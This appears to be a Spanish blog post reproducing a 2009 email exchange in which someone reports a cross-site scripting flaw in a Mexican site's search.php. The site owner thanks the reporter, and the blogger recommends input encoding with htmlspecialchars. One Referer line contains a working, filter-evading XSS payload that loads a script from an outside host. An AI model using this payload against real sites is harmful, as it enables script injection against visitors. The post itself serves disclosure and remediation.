Asunto: Re: Formulario de Contacto
Remitente: contacto
Destinatario: soporte@topmetroflog.site40.net
Fecha: 30.04.2009 14:05
Para proteger su privacidad, las imágenes externas han sido bloqueadas en este mensaje Mostrar imágenes
webmaster@chili.com.mx escribió:
Nombre: Soporte
EMAIL: soporte@topmetroflog.site40.net
Comentario: validen correctamente la busqueda porque es vulnerable a un ataque tipo xss.
Referer: http://www.chili.com.mx/search.php?q=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&_b=Buscar
Gracias por el aviso, pense que por tener mod_security configurado con
muchas reglas estaba cubierto, pero se ve que no. Voy a ver como lo
arreglo.
--
*----------------------------*
* Gerardo Perosio *
* contacto en chili *
* contacto@chili.com.mx *
*----------------------------*
Hay que validar correctamente la entrada de la variable q del archivo search.php que mediante GET recibe los parámetros de búsqueda, una solución parcial para search.php?q= podría ser
- Utilizar datos de codificación para evitar la inyección directa de caracteres potencialmente maliciosos (por ejemplo, véase la función htmlspecialchars [inglés] en PHP);
O hacer una función de validación propia.
Saludos,
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?